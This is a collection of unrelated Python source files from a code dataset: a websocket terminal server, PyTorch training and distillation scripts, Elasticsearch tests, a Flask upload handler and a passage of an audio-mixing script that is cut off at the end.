code=-1, message=\"Spawn shell timeout\"\n )\n return\n if session_timeout:\n self._session_id = ssm.create_session(\n self._shell, session_timeout\n )\n await self.send_response(\n request, platform=sys.platform, session=self._session_id\n )\n else:\n await self.send_response(request, platform=sys.platform)\n elif request[\"command\"] == proto.EnumCommand.WRITE_STDIN:\n if not self._shell:\n await self.send_response(request, code=-1, message=\"Shell not create\")\n else:\n utils.logger.debug(\n \"[%s] Input %s\" % (self.__class__.__name__, request[\"buffer\"])\n )\n self._shell.write(request[\"buffer\"])\n elif request[\"command\"] == proto.EnumCommand.RESIZE_SHELL:\n if not self._shell:\n await self.send_response(request, code=-1, message=\"Shell not create\")\n else:\n utils.logger.info(\n \"[%s] Resize shell to %d,%d\"\n % (self.__class__.__name__, request[\"size\"][0], request[\"size\"][1])\n )\n self._shell.resize(request[\"size\"])\n await self.send_response(request)\n\n async def write_shell_stdout(self, buffer):\n utils.logger.debug(\"[%s] Output %s\" % (self.__class__.__name__, buffer))\n await self.send_request(proto.EnumCommand.WRITE_STDOUT, buffer=buffer)\n\n async def spawn_shell(self, workspace, size):\n utils.logger.info(\n \"[%s] Spawn new shell (%d, %d)\"\n % (self.__class__.__name__, size[0], size[1])\n )\n self._shell = await shell.Shell.create(workspace, size)\n await self.forward_shell()\n\n async def forward_shell(self):\n tasks = [None]\n if self._shell.stderr:\n tasks.append(None)\n while self._shell and self._shell.process.returncode is None:\n if tasks[0] is None:\n tasks[0] = utils.safe_ensure_future(self._shell.stdout.read(4096))\n if self._shell.stderr and tasks[1] is None:\n tasks[1] = utils.safe_ensure_future(self._shell.stderr.read(4096))\n\n done_tasks, _ = await asyncio.wait(\n tasks, return_when=asyncio.FIRST_COMPLETED\n )\n\n for task in done_tasks:\n index = tasks.index(task)\n assert index >= 0\n tasks[index] = None\n buffer = task.result()\n if not buffer:\n await asyncio.sleep(0.01)\n break\n\n if self._shell:\n await self.write_shell_stdout(buffer)\n utils.logger.warn(\"[%s] Shell process exit\" % self.__class__.__name__)\n if self._shell:\n await self.send_request(proto.EnumCommand.EXIT_SHELL)\n self._shell = None\n\n def on_connection_close(self):\n utils.logger.warn(\"[%s] Connection closed\" % self.__class__.__name__)\n if self._shell:\n if not self._session_id:\n # Do not keep session\n self._shell.exit()\n else:\n # Wait foe client reconnect\n ShellSessionManager().update_session_time(self._session_id, time.time())\n self._shell = None\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\n \"

    Hello WSTerm

    \"\n )\n\n\ndef start_server(listen_address, path, token=None):\n utils.logger.info(\"Websocket server listening at %s:%d\" % listen_address)\n WSTerminalServerHandler.token = token\n handlers = [(path, WSTerminalServerHandler), (\"/\", MainHandler)]\n app = tornado.web.Application(handlers, websocket_ping_interval=30)\n app.listen(listen_address[1], listen_address[0])\n","sub_path":"wsterm/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299988595","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom logger import Logger\nfrom MLP import Fusion as MLP_Dense\nfrom dataloader import local_dataloader\nimport numpy as np\n\nimport os\nfrom convert_back import convert_back\n\nlogger = Logger('./logs/Dense_Resnet')\n\nnusc_classes = ['__background__',\n 'pedestrian', 'barrier', 'trafficcone', 'bicycle', 'bus', 'car', 'construction', 'motorcycle',\n 'trailer', 'truck']\n\nbatch_size = 32\nnusc_set = local_dataloader(batch_size, len(nusc_classes), training=True)\nnusc_dataloader = torch.utils.data.DataLoader(nusc_set, batch_size=batch_size, shuffle=True)\nnusc_iters_per_epoch = int(len(nusc_set) / batch_size)\n\nnum_epochs = 200\n\n# model = MLP_Dense(k = 1, feature_transform = False)\nmodel = MLP_Dense()\nmodel.cuda()\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999))\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.5)\n\nregressor = nn.SmoothL1Loss(reduction='none')\n\nimg = torch.FloatTensor(1).cuda()\ndep = torch.FloatTensor(1).cuda()\noriginalGT = torch.FloatTensor(1).cuda()\nshiftedGT = torch.FloatTensor(1).cuda()\noffSet = torch.FloatTensor(1).cuda()\ncameraMatrix = torch.FloatTensor(1).cuda()\ncameraFrameBox = torch.FloatTensor(1).cuda()\n\n\nimg = Variable(img)\ndep = Variable(dep)\noriginalGT = Variable(originalGT)\nshiftedGT = Variable(shiftedGT)\noffSet = Variable(offSet)\ncameraMatrix = Variable(cameraMatrix)\ncameraFrameBox = Variable(cameraFrameBox)\n\ndate = '2020_01_09__2'\n\nout_dir = os.path.dirname(os.path.abspath(__file__))\noutput_dir = out_dir + '/trained_model/' + date\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\nfor epoch in range(1, num_epochs + 1):\n scheduler.step()\n nusc_iter = iter(nusc_dataloader)\n loss_temp = 0\n loss_epoch = 0\n for step in range(nusc_iters_per_epoch):\n data = next(nusc_iter)\n with torch.no_grad():\n img.resize_(data[0].size()).copy_(data[0])\n dep.resize_(data[1].size()).copy_(data[1])\n originalGT.resize_(data[2].size()).copy_(data[2])\n shiftedGT.resize_(data[3].size()).copy_(data[3])\n offSet.resize_(data[4].size()).copy_(data[4])\n cameraMatrix.resize_(data[5].size()).copy_(data[5])\n cameraFrameBox.resize_(data[6].size()).copy_(data[6])\n\n optimizer.zero_grad()\n model = model.train()\n pred_offset, scores = model(img, dep, offSet, cameraMatrix)\n\n loss = 0\n\n # Unsupervised loss\n # loss = regressor(pred_offset, shiftedGT).mean(dim=(1, 2)).view(batch_size, -1) * scores - 0.1 * torch.log(scores)\n # loss = regressor(pred_offset, shiftedGT).mean(dim=(1, 2)).view(batch_size, -1)\n loss = regressor(convert_back(pred_offset, offSet, cameraMatrix), cameraFrameBox).mean(dim=(1, 2)).view(batch_size, -1) \\\n + regressor(pred_offset, shiftedGT).mean(dim=(1, 2)).view(batch_size, -1)\n\n loss = loss.sum(dim=0) / batch_size\n loss_temp += loss.item()\n loss_epoch += loss.item()\n\n loss.backward()\n optimizer.step()\n\n # Finding anchor point and predicted offset based on maximum score\n max_inds = scores.max(dim=1)[1].cpu().numpy()\n p_offset = np.zeros((4, 8, 3))\n anchor_points = np.zeros((4, 3))\n truth_boxes = np.zeros((4, 8, 3))\n #for i in range(0, 4):\n # p_offset[i] = pred_offset[i][max_inds[i]].cpu().detach().numpy()\n # truth_boxes[i] = shiftedGT[i].cpu().numpy()\n\n # visualize_result(p_offset, anchor_points, truth_boxes)\n if step % 10 == 0 and step != 0:\n loss_temp /= 10\n print(\"Epoch [{}/{}], Step [{}/{}] Loss: {:.4f}\"\n .format(epoch, num_epochs + 1, step, nusc_iters_per_epoch, loss_temp))\n loss_temp = 0\n loss_epoch /= nusc_iters_per_epoch\n logger.scalar_summary('loss', loss_epoch, epoch)\n\n print(\"Loss for Epoch {} is {}\".format(epoch, loss_epoch))\n torch.save(model.state_dict(), os.path.join(output_dir, 'Epoch:{}_loss:{}'.format(epoch, loss_epoch)))\n loss_epoch = 0\n","sub_path":"train_Fusion.py","file_name":"train_Fusion.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"5471693","text":"from taban import Fore, sleep\nimport random\n\nrenkler = [\n Fore.RED,\n Fore.GREEN,\n Fore.BLUE,\n Fore.MAGENTA,\n Fore.YELLOW,\n Fore.CYAN,\n Fore.WHITE,\n Fore.LIGHTBLACK_EX,\n Fore.LIGHTBLUE_EX,\n Fore.LIGHTGREEN_EX,\n Fore.LIGHTMAGENTA_EX,\n Fore.LIGHTRED_EX,\n Fore.LIGHTYELLOW_EX\n]\n\n\ndef kisir():\n for i in range(20):\n print(f'{random.choice(renkler)} Kısır Döngü')\n sleep(0.2)","sub_path":"Python/z_base/fonksiyonlar/dongu.py","file_name":"dongu.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113947252","text":"#!/home/ubuntu/Code/miniconda3/bin/python\nimport os\nimport numpy as np\n\nmax_num = 100000\nos.chdir(\"/shared/demux_summary\")\nsums = [ x for x in os.listdir() if \"summary.txt\" in x ]\n\nn_list = list()\ns_list = list()\nfor fp in sorted(sums) :\n sample = fp.split(\".\")[0]\n in_fh = open(fp,'r')\n name_list = list()\n num_list = list()\n for line in in_fh:\n fields = line.strip().split()\n name_list.append(fields[1])\n num_list.append(int(fields[0]))\n num_list = np.array(num_list)\n total = np.sum(num_list)\n order_idx = np.argsort(num_list)[::-1]\n name_ordered = np.array(name_list)[order_idx]\n num_ordered = num_list[order_idx]\n name_top = name_ordered[0:4]\n num_top = num_ordered[0:4]\n order_idx = np.argsort(name_top)\n name_top = list(name_top[order_idx])\n num_top = list(num_top[order_idx])\n n_list.append('\\t'.join([str(x) for x in [sample,total]+num_top[0:3]]))\n s_list.append('\\t'.join([str(x) for x in [sample,total]+name_top[0:3]]))\n\nfor x in n_list :\n print(x)\nfor x in s_list :\n print(x)\n\n","sub_path":"old_isac/nanopore/190206_demux_summarize.py","file_name":"190206_demux_summarize.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502950612","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport unittest\r\nfrom elasticsearch import Elasticsearch\r\nimport random\r\nfrom flask import Flask, render_template, request, flash, session, url_for, redirect\r\nfrom es_functions_list import *\r\nfrom es_app import app\r\n\r\ndef create_random_index(num):\r\n index_list = []\r\n for n in range(num): \r\n is_duplicate = True\r\n while is_duplicate:\r\n index_to_create = '';\r\n for i in range(10):\r\n index_to_create = index_to_create+ chr(random.randint(97, 122))\r\n if not (index_to_create in index_list):\r\n index_list.append(index_to_create)\r\n is_duplicate = False\r\n return index_list\r\n\r\n\r\n\r\nclass TestCase(unittest.TestCase):\r\n\r\n def setUp(self):\r\n app.config['TESTING'] = True\r\n self.app = app.test_client()\r\n \r\n def tearDown(self):\r\n pass\r\n\r\n def test_login_page(self):\r\n print('test login page')\r\n response = self.app.get('/', follow_redirects=True)\r\n self.assertEqual(response.status_code, 200)\r\n\r\n ##\r\n def test_updatebooking_get(self):\r\n response = self.app.get('/create', follow_redirects=True)\r\n self.assertEqual(response.status_code,200)\r\n ##\r\n\r\n\r\n def test_no_duplicated_index_created(self):\r\n ## test no duplicated index will be created \r\n index_to_create = create_random_index(1)[0]\r\n #first create if OK\r\n # second create is not OK \r\n self.assertTrue(create_index(es,index_to_create)['acknowledged'])\r\n # status 400 = index exits\r\n self.assertEqual(create_index(es,index_to_create)['status'],400)\r\n es.indices.delete(index=index_to_create, ignore=[400, 404])\r\n\r\n\r\n def test_load_data(self):\r\n ## test if data is returned in the correct format\r\n fids = [\"6cafe024c7e9f79dcb654fdc34b2577a\",\"cb404b5abaff0e2c302790c3d698d53a\",\"dc186f2d44cf7389606ed1da176aa854\"]\r\n locations =[\"/var/www/data/example.txt\", \"/var/www/data/downloads/test.txt\", \"/var/www/data/huge_file.mp4\"]\r\n location_dict =[{\"fid\": fids[0], \"location_on_disk\": locations[0]}, \\\r\n {\"fid\": fids[1],\"location_on_disk\": locations[1]},\\\r\n {\"fid\": fids[2],\"location_on_disk\":locations[2]}]\r\n self.assertEqual(load_data(fids, locations), location_dict)\r\n\r\n def test_new_created_index(self):\r\n ## test new created indices are included in thev list of all index\r\n new_index_list = create_random_index(5)\r\n existing_index_list = get_index_list(es)\r\n #print(existing_index_list)\r\n is_in_list = False\r\n for index in new_index_list:\r\n if self.assertNotIn(index, existing_index_list):\r\n is_in_list = True\r\n break\r\n \r\n if not is_in_list:\r\n for index in new_index_list:\r\n create_index(es,index)\r\n new_existing_index_list = get_index_list(es)\r\n #print(new_existing_index_list)\r\n for index in new_index_list:\r\n self.assertIn(index, new_existing_index_list)\r\n es.indices.delete(index=index, ignore=[400, 404])\r\n\r\n def test_no_document_in_index(self):\r\n ## test new created index has no document \r\n index_to_create = create_random_index(1)[0]\r\n existing_index_list = get_index_list(es)\r\n if not index_to_create in existing_index_list:\r\n create_index(es,index_to_create)\r\n msg, d_list, l_list = query_all(es, index_to_create)\r\n self.assertEqual(msg, 'Selected index '+ index_to_create + ' has no ' + ' documents.')\r\n self.assertEqual(d_list, [\"No Document in Selected Index\"])\r\n es.indices.delete(index=index_to_create, ignore=[400, 404])\r\n\r\n def test_document_in_index(self):\r\n ## test new created index has no document \r\n index_to_create = create_random_index(1)[0]\r\n existing_index_list = get_index_list(es)\r\n fids = [\"6cafe024c7e9f79dcb654fdc34b2577a\",\"cb404b5abaff0e2c302790c3d698d53a\",\"dc186f2d44cf7389606ed1da176aa854\"]\r\n locations =[\"/var/www/data/example.txt\", \"/var/www/data/downloads/test.txt\", \"/var/www/data/huge_file.mp4\"]\r\n if not index_to_create in existing_index_list:\r\n create_index(es,index_to_create)\r\n data = load_data(fids, locations)\r\n create_data(es, index_to_create,data)\r\n es.indices.refresh(index=index_to_create)\r\n msg, d_list, l_list= query_all(es, index_to_create)\r\n self.assertEqual(msg, index_to_create + ' has ' + str(len(locations))+ ' documents of this app.' ) \r\n self.assertEqual(l_list, locations)\r\n es.indices.delete(index=index_to_create, ignore=[400, 404])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n username = input('Elasticsearch user name: ')\r\n password = input('Elasticsearch user password: ')\r\n es = Elasticsearch(hosts=['localhost:9200'], http_auth=(username, password))\r\n if es.ping():\r\n unittest.main()\r\n else:\r\n print('Cannot connect to local Elasticsearch. No test is done.')\r\n","sub_path":"es_tests.py","file_name":"es_tests.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299874476","text":"import datetime\nimport os\n\nclass Account:\n def account_load(self):\n path_account = 'Data\\\\account.txt'\n path_log = 'Data\\\\log.txt'\n try:\n if os.path.exists(path_account):\n pass\n else:\n print(\"계정 파일이 없어 새로 생성합니다.\")\n accountfile = open(path_account, 'w')\n accountfile.writelines(input(\"ID를 입력하세요: \"))\n accountfile.writelines(\"\\n\")\n accountfile.writelines(input(\"PW를 입력하세요: \"))\n accountfile.close()\n file = open(path_account, 'r')\n reader = file.readlines()\n account_list = []\n for data in reader:\n account_list.append(data.replace('\\n', ''))\n return account_list\n except Exception as error:\n logfile = open(path_log, 'a')\n print(str(datetime.datetime.now()) + \": \" + error)\n logfile.writelines(str(datetime.datetime.now()) + \": \" + error + \"\\n\")\n logfile.close()\n\nif __name__ == \"__main__\":\n acc = Account()\n acc.account_load()","sub_path":"namdo_crowler/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"271544449","text":"import copy\nimport os.path\nimport datetime\n\nimport validators\n\nfrom . import base\nfrom . import util\nfrom . import files\nfrom . import rules\nfrom . import config\nfrom .dao import reaperutil, APIStorageException\nfrom . import validators\nfrom . import tempdir as tempfile\n\nlog = config.log\n\nclass Upload(base.RequestHandler):\n\n def reaper(self):\n \"\"\"Receive a sortable reaper upload.\"\"\"\n if not self.superuser_request:\n self.abort(402, 'uploads must be from an authorized drone')\n with tempfile.TemporaryDirectory(prefix='.tmp', dir=config.get_item('persistent', 'data_path')) as tempdir_path:\n try:\n file_store = files.FileStore(self.request, tempdir_path)\n except files.FileStoreException as e:\n self.abort(400, str(e))\n now = datetime.datetime.utcnow()\n fileinfo = dict(\n name=file_store.filename,\n created=now,\n modified=now,\n size=file_store.size,\n hash=file_store.hash,\n tags=file_store.tags,\n metadata=file_store.metadata\n )\n container = reaperutil.create_container_hierarchy(file_store.metadata)\n f = container.find(file_store.filename)\n target_path = os.path.join(config.get_item('persistent', 'data_path'), util.path_from_hash(fileinfo['hash']))\n if not f:\n file_store.move_file(target_path)\n container.add_file(fileinfo)\n rules.create_jobs(config.db, container.acquisition, 'acquisition', fileinfo)\n elif not file_store.identical(util.path_from_hash(fileinfo['hash']), f['hash']):\n file_store.move_file(target_path)\n container.update_file(fileinfo)\n rules.create_jobs(config.db, container.acquisition, 'acquisition', fileinfo)\n throughput = file_store.size / file_store.duration.total_seconds()\n log.info('Received %s [%s, %s/s] from %s' % (file_store.filename, util.hrsize(file_store.size), util.hrsize(throughput), self.request.client_addr))\n\n def engine(self):\n \"\"\"\n URL format: api/engine?level=&id=\n\n It expects a multipart/form-data request with a \"metadata\" field (json valid against api/schemas/input/enginemetadata)\n and 0 or more file fields with a non null filename property (filename is null for the \"metadata\").\n \"\"\"\n level = self.get_param('level')\n if level is None:\n self.abort(404, 'container level is required')\n if level != 'acquisition':\n self.abort(404, 'engine uploads are supported only at the acquisition level')\n acquisition_id = self.get_param('id')\n if not acquisition_id:\n self.abort(404, 'container id is required')\n else:\n acquisition_id = util.ObjectId(acquisition_id)\n if not self.superuser_request:\n self.abort(402, 'uploads must be from an authorized drone')\n with tempfile.TemporaryDirectory(prefix='.tmp', dir=config.get_item('persistent', 'data_path')) as tempdir_path:\n try:\n file_store = files.MultiFileStore(self.request, tempdir_path)\n except files.FileStoreException as e:\n self.abort(400, str(e))\n if not file_store.metadata:\n self.abort(400, 'metadata is missing')\n metadata_validator = validators.payload_from_schema_file(self, 'enginemetadata.json')\n metadata_validator(file_store.metadata, 'POST')\n file_infos = file_store.metadata['acquisition'].pop('files', [])\n now = datetime.datetime.utcnow()\n try:\n acquisition_obj = reaperutil.update_container_hierarchy(file_store.metadata, acquisition_id, level)\n except APIStorageException as e:\n self.abort(400, e.message)\n # move the files before updating the database\n for name, fileinfo in file_store.files.items():\n path = fileinfo['path']\n target_path = os.path.join(config.get_item('persistent', 'data_path'), util.path_from_hash(fileinfo['hash']))\n files.move_file(path, target_path)\n # merge infos from the actual file and from the metadata\n merged_infos = self._merge_fileinfos(file_store.files, file_infos)\n # update the fileinfo in mongo if a file already exists\n for f in acquisition_obj['files']:\n fileinfo = merged_infos.get(f['name'])\n if fileinfo:\n fileinfo.pop('path', None)\n fileinfo['modified'] = now\n acquisition_obj = reaperutil.update_fileinfo('acquisitions', acquisition_obj['_id'], fileinfo)\n fileinfo['existing'] = True\n # create the missing fileinfo in mongo\n for name, fileinfo in merged_infos.items():\n # if the file exists we don't need to create it\n # skip update fileinfo for files that doesn't have a path\n if not fileinfo.get('existing') and fileinfo.get('path'):\n del fileinfo['path']\n fileinfo['created'] = now\n fileinfo['modified'] = now\n acquisition_obj = reaperutil.add_fileinfo('acquisitions', acquisition_obj['_id'], fileinfo)\n\n for f in acquisition_obj['files']:\n if f['name'] in file_store.files:\n file_ = {\n 'name': f['name'],\n 'hash': f['hash'],\n 'type': f.get('type'),\n 'measurements': f.get('measurements', [])\n }\n rules.create_jobs(config.db, acquisition_obj, 'acquisition', file_)\n return [{'name': k, 'hash': v['hash'], 'size': v['size']} for k, v in merged_infos.items()]\n\n def _merge_fileinfos(self, hard_infos, infos):\n \"\"\"it takes a dictionary of \"hard_infos\" (file size, hash)\n merging them with infos derived from a list of infos on the same or on other files\n \"\"\"\n new_infos = copy.deepcopy(hard_infos)\n for info in infos:\n new_infos[info['name']] = new_infos.get(info['name'], {})\n new_infos[info['name']].update(info)\n return new_infos\n","sub_path":"api/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"372192109","text":"import os\nimport sys\n\nfrom scipy.stats import pearsonr, spearmanr\nfrom torch.nn.utils import clip_grad_norm_\nfrom torch.optim import Adadelta, Adam\nfrom tqdm import tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .args import read_args\nfrom dbert.distill.data import find_dataset, set_seed, replace_embeds, list_field_mappings\nimport dbert.distill.model as mod\n\n\ndef evaluate(model, ds_iter, criterion, export_eval_labels=False):\n ds_iter.init_epoch()\n model.eval()\n acc = 0\n n = 0\n loss = 0\n gts = []\n preds = []\n for batch in tqdm(ds_iter):\n scores = model(batch.sentence1, batch.sentence2)\n # loss += criterion(scores, batch.is_duplicate).item()\n # labels_prob = F.softmax(scores, dim=1)[:,0]\n # labels = scores.max(1)[1]\n # labels_prob = labels\n # acc += ((labels == batch.is_duplicate).float().sum()).item()\n acc += scores.mean().item()\n try:\n gts.extend(batch.score.view(-1).tolist())\n preds.extend(scores.view(-1).tolist())\n except:\n continue\n n += scores.size(0)\n if export_eval_labels:\n print(\"\\n\".join(list(map(str, scores.view(-1).cpu().tolist()))))\n if len(gts) == 0:\n return 0, 0\n pr = pearsonr(preds, gts)[0]\n sr = spearmanr(preds, gts)[0]\n return pr, sr\n\n\ndef main():\n args = read_args(default_config=\"confs/kim_cnn_sst2.json\")\n args.epochs = 1000\n set_seed(args.seed)\n try:\n os.makedirs(args.workspace)\n except:\n pass\n torch.cuda.deterministic = True\n\n dataset_cls = find_dataset(args.dataset_name)\n training_iter, dev_iter, test_iter = dataset_cls.iters(args.dataset_path, args.vectors_file, args.vectors_dir,\n batch_size=args.batch_size, device=args.device, train=args.train_file, dev=args.dev_file, test=args.test_file)\n\n args.dataset = training_iter.dataset\n args.words_num = len(training_iter.dataset.TEXT_FIELD.vocab)\n model = mod.SiameseRNNModel(args).to(args.device)\n ckpt_attrs = mod.load_checkpoint(model, args.workspace,\n best=args.load_best_checkpoint) if args.load_last_checkpoint or args.load_best_checkpoint else {}\n sd = torch.load('nw-qqp/best_model.pt')['state_dict']\n for k in list(sd.keys()):\n if any(x in k for x in ('embed', 'fc2')): del sd[k]\n # model.load_state_dict(sd, strict=False)\n offset = ckpt_attrs.get(\"epoch_idx\", -1) + 1\n args.epochs -= offset\n\n embs, field_src_vocab = torch.load('nw-qqp/qqp-embs.pt')\n field_mappings = list_field_mappings(dataset_cls.TEXT_FIELD, field_src_vocab)\n # replace_embeds(model.non_static_embed, embs, field_mappings)\n\n training_pbar = tqdm(total=len(training_iter), position=2)\n training_pbar.set_description(\"Training\")\n dev_pbar = tqdm(total=args.epochs, position=1)\n dev_pbar.set_description(\"Dev\")\n\n criterion = nn.CrossEntropyLoss()\n kd_criterion = nn.MSELoss()# KLDivLoss(reduction=\"batchmean\")\n params = list(map(lambda x: x[1], filter(lambda x: x[1].requires_grad and 'fc2' in x[0], model.named_parameters())))\n optimizer = Adadelta(params, lr=args.lr, rho=0.95)\n #optimizer = Adam(params, lr=args.lr)\n increment_fn = mod.make_checkpoint_incrementer(model, args.workspace, save_last=True,\n best_loss=ckpt_attrs.get(\"best_dev_loss\", 10000))\n non_embedding_params = model.non_embedding_params()\n # torch.save((model.non_static_embed, dataset_cls.TEXT_FIELD.vocab), 'sts-embs.pt')\n # return\n\n if args.use_data_parallel:\n model = nn.DataParallel(model)\n if args.eval_test_only:\n test_acc, _ = evaluate(model, test_iter, criterion, export_eval_labels=args.export_eval_labels)\n print(test_acc)\n return\n if args.epochs == 0:\n print(\"No epochs left from loaded model.\", file=sys.stderr)\n return\n for epoch_idx in tqdm(range(args.epochs), position=0):\n training_iter.init_epoch()\n model.train()\n training_pbar.n = 0\n training_pbar.refresh()\n for batch in training_iter:\n training_pbar.update(1)\n optimizer.zero_grad()\n # logits = model(batch.question1, batch.question2)\n logits = model(batch.sentence1, batch.sentence2)\n # kd_logits = torch.stack((batch.logits_0, batch.logits_1), 1)\n kd_logits = torch.stack((batch.score,), 1)\n #kd = args.distill_lambda * kd_criterion(F.log_softmax(logits / args.distill_temperature, 1),\n # F.softmax(kd_logits / args.distill_temperature, 1))\n kd = args.distill_lambda * kd_criterion(logits, kd_logits)\n # loss = args.ce_lambda * criterion(logits, batch.is_duplicate) + kd\n loss = kd\n loss.backward()\n clip_grad_norm_(non_embedding_params, args.clip_grad)\n optimizer.step()\n # acc = ((logits.max(1)[1] == batch.is_duplicate).float().sum() / batch.is_duplicate.size(0)).item()\n training_pbar.set_postfix(loss=f\"{loss.item():.4}\")\n\n model.eval()\n dev_pr, dev_sr = evaluate(model, dev_iter, criterion)\n dev_pbar.update(1)\n dev_pbar.set_postfix(pearsonr=f\"{dev_pr:.4}\")\n is_best_dev = increment_fn(-dev_pr, dev_sr=dev_sr, dev_pr=dev_pr, epoch_idx=epoch_idx + offset)\n\n if is_best_dev:\n dev_pbar.set_postfix(pearsonr=f\"{dev_pr:.4} (best loss)\")\n # test_acc, _ = evaluate(model, test_iter, criterion, export_eval_labels=args.export_eval_labels)\n training_pbar.close()\n dev_pbar.close()\n # print(f\"Test accuracy of the best model: {test_acc:.4f}\", file=sys.stderr)\n # print(test_acc)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dbert/distill/run/distill_siamese_rnn_mse.py","file_name":"distill_siamese_rnn_mse.py","file_ext":"py","file_size_in_byte":5710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"551111426","text":"import argparse\nimport json\nfrom tqdm import tqdm\nimport soundfile as sf\nimport numpy as np\nimport os\nimport pyloudnorm\nfrom scipy.signal import resample_poly\nimport pandas as pd\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--json\", default=\"/home/fei/SparseLibriMix/metadata/sparse_5_0.2/metadata.json\") # choose n_speakers and overlap_ratio\nparser.add_argument(\"--librispeech_dir\", default=\"/storageNVME/fei/data/speech/Librimix/LibriSpeech/test-clean/\")\nparser.add_argument('--out_dir', help='output data dir of mixture', default=\"/storageNVME/fei/data/speech/Librimix/SparseLibriMix/wav8000/sparse_5_0.2\")\nparser.add_argument(\"--noise_dir\", type=str, default=\"/storageNVME/fei/data/speech/Librimix/wham_noise/tt\")\nparser.add_argument('--rate', type=int, default=8000,\n help='sampling rate')\n\n# parser.add_argument(\"json\")\n# parser.add_argument(\"librispeech_dir\")\n# parser.add_argument('out_dir',help='output data dir of mixture')\n# parser.add_argument(\"--noise_dir\", type=str, default=\"\")\n# parser.add_argument('--rate', type=int, default=16000,\n# help='sampling rate')\n\ndef main(args):\n if not args.noise_dir:\n print(\"Generating only clean version\")\n\n with open(args.json, \"r\") as f:\n total_meta = json.load(f)\n\n # Dictionary that will contain all metadata\n md_dic = {}\n # Create Dataframes\n dir_name = args.json.split('/')[-2]\n n_src = int(dir_name.split('_')[1])\n print(n_src, dir_name)\n md_dic[f'mixture_{dir_name}_mix_clean'] = create_empty_mixture_md(n_src, 'mix_clean')\n if args.noise_dir:\n md_dic[f'mixture_{dir_name}_mix_noisy'] = create_empty_mixture_md(n_src, 'mix_noisy')\n\n for mix in tqdm(total_meta):\n # filename = mix[\"mixture_name\"]\n sources_list = [x for x in mix.keys() if x != \"mixture_name\"]\n\n sources = {}\n utt_id_list = ['' for i in range(n_src)]\n maxlength = 0\n for source in sources_list:\n # read file optional resample it\n source_utts = []\n for utt in mix[source]:\n if utt[\"source\"] != \"noise\": # speech file\n utt[\"file\"] = os.path.join(args.librispeech_dir, utt[\"file\"])\n else:\n if args.noise_dir:\n utt[\"file\"] = os.path.join(args.noise_dir, utt[\"file\"])\n else:\n continue\n\n utt_fs = sf.SoundFile(utt[\"file\"]).samplerate\n audio, fs = sf.read(utt[\"file\"], start=int(utt[\"orig_start\"]*utt_fs),\n stop=int(utt[\"orig_stop\"]*utt_fs))\n\n #assert len(audio.shape) == 1, \"we currently not support multichannel\"\n if len(audio.shape) > 1:\n audio = audio[:, utt[\"channel\"]] #TODO\n audio = audio - np.mean(audio) # zero mean cos librispeech is messed up sometimes\n audio = resample_and_norm(audio, fs, args.rate, utt[\"lvl\"])\n audio = np.pad(audio, (int(utt[\"start\"]*args.rate), 0), \"constant\") # pad the beginning\n source_utts.append(audio)\n maxlength = max(len(audio), maxlength)\n if source != \"noise\":\n utt_id = utt[\"utt_id\"]\n sources[source] = source_utts\n if source != \"noise\":\n utt_id_list[int(source[1:])-1] = utt_id\n\n filename = '_'.join(utt_id_list)\n\n # pad everything to same length\n for s in sources.keys():\n for i in range(len(sources[s])):\n tmp = sources[s][i]\n sources[s][i] = np.pad(tmp, (0, maxlength-len(tmp)), 'constant')\n\n # mix n sum\n tot_mixture = None\n abs_source_path_list = ['' for i in range(n_src)]\n for indx, s in enumerate(sources.keys()):\n if s == \"noise\":\n continue\n source_mix = np.sum(sources[s], 0)\n os.makedirs(os.path.join(args.out_dir, s), exist_ok=True)\n sf.write(os.path.join(args.out_dir, s, filename + \".wav\"), source_mix, args.rate)\n if indx == 0:\n tot_mixture = source_mix\n else:\n tot_mixture += source_mix\n abs_source_path_list[int(s[1:])-1] = os.path.join(args.out_dir, s, filename + \".wav\")\n\n os.makedirs(os.path.join(args.out_dir, \"mix_clean\"), exist_ok=True)\n sf.write(os.path.join(args.out_dir, \"mix_clean\", filename + \".wav\"), tot_mixture, args.rate)\n\n add_to_mixture_metadata(md_dic[f'mixture_{dir_name}_mix_clean'], filename,\n os.path.join(args.out_dir, \"mix_clean\", filename + \".wav\"),\n abs_source_path_list,\n maxlength, \"mix_clean\")\n\n if args.noise_dir:\n s = \"noise\"\n source_mix = np.sum(sources[s], 0)\n os.makedirs(os.path.join(args.out_dir, s), exist_ok=True)\n sf.write(os.path.join(args.out_dir, s, filename + \".wav\"), source_mix, args.rate)\n tot_mixture += source_mix\n os.makedirs(os.path.join(args.out_dir, \"mix_noisy\"), exist_ok=True)\n sf.write(os.path.join(args.out_dir, \"mix_noisy\", filename + \".wav\"), tot_mixture, args.rate)\n\n # Save the metadata files\n metadata_path = os.path.join('/'.join(args.out_dir.split('/')[:-1]), 'metadata')\n os.makedirs(metadata_path, 